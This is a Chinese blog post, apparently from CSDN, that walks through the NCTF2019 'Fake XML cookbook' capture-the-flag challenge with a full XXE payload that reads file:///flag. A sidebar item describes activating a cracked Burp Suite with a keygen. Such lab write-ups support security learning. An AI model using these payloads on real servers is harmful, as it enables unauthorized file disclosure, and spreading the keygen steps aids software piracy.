NCTF2019 Fake XML cookbook

最新推荐文章于 2024-01-30 21:53:52 发布
最新推荐文章于 2024-01-30 21:53:52 发布
阅读量176 收藏 2
点赞数
分类专栏: CTF 文章标签: xml 前端 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45619909/article/details/128946975
版权

打开靶机如图:

蒙了几个username和password都显示错误,看来没有太多提示了。既然题目提示了XML那就百度一波。已知晓XML存在实体注入,引入实体文件,然后读取它就完成注入了。我们抓包看看存不存在相关XML语句。如下:

发现使用XML存储username和password。将内容发送至Repeater,然后写入恶意实体,注意这里是使用file://协议读取flag文件,并且将这个文件赋给admin。后面的admin前有&的意思是读取admin。所以这里会读取flag文件。注意&admin后面要加 ; 。因为是当作语句执行的。恶意实体代码:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user>
  <username>
	&admin;
  </username>
  <password>
	123456
  </password>
</user>

写好如下

发包

得出flag,感觉挺顺利的,第一次遇见xml实体注入,或者叫XXE攻击。

Tajang
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
[NCTF2019]Fake XML cookbook
weixin_55710577的博客
06-23 1751
[NCTF2019]Fake XML cookbook
XXE漏洞 [NCTF2019]Fake XML cookbook1
m0_75178803的博客
12-17 521
但是很明显这样是不行的,因为资源是在admin上,也就是用户名那里。发现我们post传入的数据都被放到了doLogin.php下面。提示加载外部xml实体。
[NCTF2019]Fake XML cookbook 1
plant1234的博客
06-02 619
buuctf-[NCTF2019]Fake XML cookbook(小宇特详解)
小宇的web博客
02-18 4276
buuctf-[NCTF2019]Fake XML cookbook(小宇特详解) 这里先看题 乍一看像是sql注入,但是题目提示了是xml,这里就不考虑sql注入了。 先抓包看一下 这里的X-Requested-With提示了XML 然后发送到了doLogin.php 这里先讲一下XML的相关知识 XXE的危害和SSRF的有点像 XXE=>XML外部实体注入(被各种后端脚本调用) XML=>像html,html的目的是显示数据,但是xml的目的是传输数据,他没有预定义,他是纯文本,他是不会
[NCTF2019]Fake XML cookbook(特详解)
热门推荐
qq_74806534的博客
01-30 2万+
攻击者可以通过构造恶意的 XML 文档将其发送到应用程序中,在解析该文档时,XML 解析器会加载外部实体(如文件、URL等),以便在文档中引用它们。PHP 默认使用 libxml 来解析 XML,但是从 libxml 2.9.0 开始,它默认不再解析外部实体,导致 PHP 下的 XXE 漏洞已经逐渐消失,除非你指定 LIBLXML_NOENT 去开启外部实体解析,才会存在 XXE 漏洞。4.在成功回调函数中,根据返回的 XML 数据解析出登录结果的代码和消息,然后根据不同的结果更新页面上的提示信息。
web buuctf [NCTF2019]Fake XML cookbook1
weixin_44214568的博客
03-31 680
考点:XXE(XML External Entity Injection 即XML外部实体注入) 1.界面 随便填入信息,进行抓包 2.分析请求头, 有x-requests-with,可以知道请求是ajax请求(ajax 全名asyncjavascript and XML(异步JavaScript和XML))也就是通过xml进行数据传输 https://xz.aliyun.com/t/6887#toc-0 抓包更改xml <?xml version="1.0" encoding..
BUUCTF [NCTF2019] Fake XML cookbook
Senimo
01-03 797
[NCTF2019]Fake XML cookbook 考点: 启动环境: 由题目提示,猜测为XXE漏洞。 首先尝试登陆: 使用BurpSuite抓取数据包: 看到了其中的XML代码: <user><username>admin</username><password>admin</password></user> 查看网页源码: <script type='text/javascript'> function d
[NCTF2019]Fake XML cookbook1
whale_waves的博客
12-11 768
xml注入其实和sql注入类似,利用了xml的解析机制如果系统没有将‘’进行转义,那么攻击者就可以修改或者添加xml信息 例如: 这里是正常的注册的xml 用户输入 假如我添加一个呢,这样是否就将我们输入的用户名变成了权限 用户输入
BUUCTF[NCTF2019]Fake XML cookbook
qq_62078839的博客
03-30 228
打开发现一个登录窗口,尝试常见的admin密码登录不超过,直接BP抓包 发现username和password是xml格式 尝试XML外部实体注入 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]> <user><username>&admin;</userna...
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛是一项旨在推动我国高校电子信息类专业教学改革,提高学生动手能力和工程实践能力的重要赛事。这个.7z压缩包文件包含了自大赛创办以来,从第一届到第十四届的所有竞赛题目,对于参赛学生、...
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
Burpsuite2020.12.1最新版蓝色款
Tajang的大千世界
12-22 9292
最新版Burpsuite下载破解安装 安装包链接:https://cloud.189.cn/t/qUVzYbuAJzqm(访问码:mw12) 1.首先,我们解压,可以看到解压后的文件夹里有如下文件 2.双击BURP.cmd,打开后需要输入key 3.我们打开BurpSuite KeyGen By Uncia.jar,将lisense里的码复制到刚才的burpsuite里 将lisense复制到burpsuite里点击next 4.我们可以看到下图: 5.点击Manual activation,显示下图: 6
首届安徽省“追日杯”大学生网络安全挑战赛WriteUp
Tajang的大千世界
12-09 4800
第六,应该能混个三等奖 题量很大,打的人少,很多题都是0解,Reverse全0解,其他方向大都是个位数,综合渗透那里,题特别多,做了一个第一题就没做了,也挺难的,但是分还很低。怪怪的。 Web gotofly 题目一直重定向,即使到了flag页面,立即刷新也看不见,BP直接抓包,一页一页翻就行了 Misc chess 半自动化脚本 # -- coding=utf8 -- from pwn import * io=remote("ctf.zrb.edisec.net",33741) win_data='
[WUSTCTF2020]颜值成绩查询
Tajang的大千世界
11-19 3746
经过测试,我们可以发现输入一到4都是有回显的,虽然后面几个是乱码,比如名字和分数怪怪的。但是还是有固定英文的,比如Hi,your score is: 后面的测试就很明显了,输入其他字符报错,无报错回显,摆明了布尔注入。所以我们需要构造一个验证正确与否的语句,用于判断字母,这里先介绍一下异或注入 异或注入,是在 SQL 注入中,利用 Mysql 对异或逻辑的处理特性,帮助进行 SQL 注入的利用,作用包括但不限于绕过敏感词过滤、判断过滤内容和直接进行盲注利用。 在 Mysql 中,异或操作的两个关键词是 “
蓝帽杯2021 One Pointer PHP
Tajang的大千世界
11-23 3720
第一次打FPM/FastCGI的题,实际上也是第一次接触打中间件的题,刚开始是在陇原战“疫”碰到了一道类似的题,也是改编的这道,为了更好地复现这道题,理解这道题,我去把Fastcgi 协议分析与 PHP-FPM 攻击方法都看了几遍。攻击的实操部分,本来想着复现,但那个鬼环境一直差点意思。这里不得不提中国网安界大神——phith0n,P神开创的vulhub确实帮了国内外网络安全学习者的大忙,让安全研究者更加专注于漏洞原理本身,而不是忙于搭建复杂的漏洞环境。但不幸的事,这个洞的环境坏了,问了P神说官网要下架,让
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tajang

感谢投喂

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值